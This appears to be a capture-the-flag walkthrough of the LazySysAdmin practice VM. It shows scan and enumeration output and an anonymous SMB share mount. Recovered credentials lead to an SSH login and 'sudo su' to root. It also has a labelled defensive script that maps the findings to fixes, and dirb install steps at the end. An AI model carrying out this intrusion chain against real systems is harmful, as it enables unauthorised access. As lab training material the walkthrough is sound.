```
Currently scanning: 192.168.21.0/16   |   Screen View: Unique Hosts

1 Captured ARP Req/Rep packets, from 1 hosts.   Total size: 42
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.0.100   08:00:27:da:8a:ac      1      42  PCS Systemtechnik GmbH
```
```
Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2018-01-31 12:53:27 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [10000 ports/host]
Discovered open port 3306/tcp on 192.168.0.100
Discovered open port 6667/tcp on 192.168.0.100
Discovered open port 22/tcp on 192.168.0.100
Discovered open port 139/tcp on 192.168.0.100
Discovered open port 80/tcp on 192.168.0.100
Discovered open port 445/tcp on 192.168.0.100
```
```
TRACEROUTE
HOP RTT     ADDRESS
1   0.50 ms LazySysAdmin.lan (192.168.0.100)

NSE: Script Post-scanning.
Initiating NSE at 20:55
Completed NSE at 20:55, 0.00s elapsed
Initiating NSE at 20:55
Completed NSE at 20:55, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.19 seconds
           Raw packets sent: 11045 (487.680KB) | Rcvd: 11034 (442.816KB)
```
```
        WordPress Security Scanner by the WPScan Team
                       Version 2.9.3
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.0.100/wordpress/
[+] Started: Thu Feb  1 01:37:20 2018

[!] The WordPress 'http://192.168.0.100/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://192.168.0.100/wordpress/index.php?rest_route=/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.22
[!] Registration is enabled: http://192.168.0.100/wordpress/wp-login.php?action=register
[+] XML-RPC Interface available under: http://192.168.0.100/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.0.100/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.0.100/wordpress/wp-includes/

[+] WordPress version 4.8.5 (Released on 2018-01-16) identified from meta generator, links opml

[+] WordPress theme in use: twentyfifteen - v1.8

[+] Name: twentyfifteen - v1.8
 |  Last updated: 2017-11-16T00:00:00.000Z
 |  Location: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/
 |  Readme: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/readme.txt
[!] The version is out of date, the latest version is 1.9
 |  Style URL: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/style.css
 |  Theme Name: Twenty Fifteen
 |  Theme URI: https://wordpress.org/themes/twentyfifteen/
 |  Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple,...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found
```
```
 =============================================
|    Nbtstat Information for 192.168.0.100    |
 =============================================
Looking up status of 192.168.0.100
	LAZYSYSADMIN    <00> -         B <ACTIVE>  Workstation Service
	LAZYSYSADMIN    <03> -         B <ACTIVE>  Messenger Service
	LAZYSYSADMIN    <20> -         B <ACTIVE>  File Server Service
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

	MAC Address = 00-00-00-00-00-00

 ======================================
|    Session Check on 192.168.0.100    |
 ======================================
[+] Server 192.168.0.100 allows sessions using username '', password ''

 ============================================
|    Getting domain SID for 192.168.0.100    |
 ============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 =======================================
|    OS information on 192.168.0.100    |
 =======================================
[+] Got OS info for 192.168.0.100 from smbclient:
[+] Got OS info for 192.168.0.100 from srvinfo:
	LAZYSYSADMIN   Wk Sv PrQ Unx NT SNT Web server
	platform_id     :	500
	os version      :	6.1
	server type     :	0x809a03

 ==============================
|    Users on 192.168.0.100    |
 ==============================

 ==========================================
|    Share Enumeration on 192.168.0.100    |
 ==========================================
WARNING: The "syslog" option is deprecated

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	share$          Disk      Sumshare
	IPC$            IPC       IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP

[+] Attempting to map shares on 192.168.0.100
//192.168.0.100/print$	Mapping: DENIED, Listing: N/A
//192.168.0.100/share$	Mapping: OK, Listing: OK
//192.168.0.100/IPC$	[E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 =====================================================
|    Password Policy Information for 192.168.0.100    |
 =====================================================

[+] Attaching to 192.168.0.100 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

	[+] LAZYSYSADMIN
	[+] Builtin

[+] Password Info for Domain: LAZYSYSADMIN

	[+] Minimum password length: 5
	[+] Password history length: None
	[+] Maximum password age: Not Set
	[+] Password Complexity Flags: 000000

 ===============================
|    Groups on 192.168.0.100    |
 ===============================

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ========================================================================
|    Users on 192.168.0.100 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)

 ==============================================
|    Getting printer info for 192.168.0.100    |
 ==============================================
No printers returned.

enum4linux complete on Thu Feb  1 00:46:33 2018
```
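As an added, defender-side example that is not part of the original walkthrough: a small Python triage script that reads lines in the format of the wpscan and enum4linux output above and maps each exposure to a remediation. The sample text is constructed from those findings, and the RULES table, severities and the 12-character password baseline are my own assumptions rather than anything either tool emits.

```python
import re

# Constructed sample, modelled on the wpscan/enum4linux lines in the walkthrough
SAMPLE_OUTPUT = """\
[!] Registration is enabled: http://192.168.0.100/wordpress/wp-login.php?action=register
[+] XML-RPC Interface available under: http://192.168.0.100/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.0.100/wordpress/wp-content/uploads/
[+] Server 192.168.0.100 allows sessions using username '', password ''
//192.168.0.100/print$ Mapping: DENIED, Listing: N/A
//192.168.0.100/share$ Mapping: OK, Listing: OK
[+] Minimum password length: 5
[+] Password Complexity Flags: 000000
"""

# (regex, severity, remediation); severities and fixes are this example's
# own assumptions, not output of either scanner
RULES = [
    (r"Registration is enabled", "medium",
     "turn off 'Anyone can register' under Settings > General"),
    (r"XML-RPC Interface available", "low",
     "block xmlrpc.php unless a client actually needs it"),
    (r"directory listing enabled", "medium",
     "set 'Options -Indexes' in the Apache vhost"),
    (r"allows sessions using username '', password ''", "high",
     "set 'restrict anonymous = 2' and 'map to guest = never' in smb.conf"),
    (r"^//\S+ Mapping: OK, Listing: OK", "high",
     "share is readable without credentials; require an authenticated user"),
    (r"Minimum password length: (\d+)", "medium",
     "raise the minimum password length"),
    (r"Password Complexity Flags: 0+$", "medium",
     "enable password complexity"),
]
SEVERITY_ORDER = {"high": 0, "medium": 1, "low": 2}

def triage(text, min_pw_len=12):
    """Return (severity, line, fix) tuples, highest severity first."""
    findings = []
    for line in text.splitlines():
        for pattern, severity, fix in RULES:
            m = re.search(pattern, line)
            if not m:
                continue
            # the length rule carries a capture group: only flag it when the
            # observed minimum is below our baseline
            if m.groups() and int(m.group(1)) >= min_pw_len:
                continue
            findings.append((severity, line.strip(), fix))
    findings.sort(key=lambda f: SEVERITY_ORDER[f[0]])  # stable sort keeps input order within a level
    return findings

if __name__ == "__main__":
    for sev, line, fix in triage(SAMPLE_OUTPUT):
        print(f"[{sev.upper()}] {line}\n    fix: {fix}")
```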
Retrieving the shared resource on Windows

```
net use k: \\192.168.0.100\share$
```
Retrieving the shared resource on Linux

```
mount -t cifs -o username='',password='' //192.168.0.100/share$ /mnt
```
Two key files are found: deets.txt and wp-config.php.

So we try to log in to phpMyAdmin with the MySQL username and password obtained above, but find that not a single table can be viewed.

That doesn't matter: another password, 12345, was also found above, and earlier, when we opened the WordPress page, it displayed "My name is togie.", so we can try logging in over SSH with username togie and password 12345, and the login succeeds.
```
togie@LazySysAdmin:~$ whoami
togie
togie@LazySysAdmin:~$ id
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
togie@LazySysAdmin:~$ sudo su
[sudo] password for togie:
root@LazySysAdmin:/home/togie# id
uid=0(root) gid=0(root) groups=0(root)
```
```
wget https://svwh.dl.sourceforge.net/project/dirb/dirb/2.22/dirb222.tar.gz
tar zxvf dirb222.tar.gz
cd dirb222/
apt-get install libcurl4-gnutls-dev
./configure && make
./dirb   # just run it
```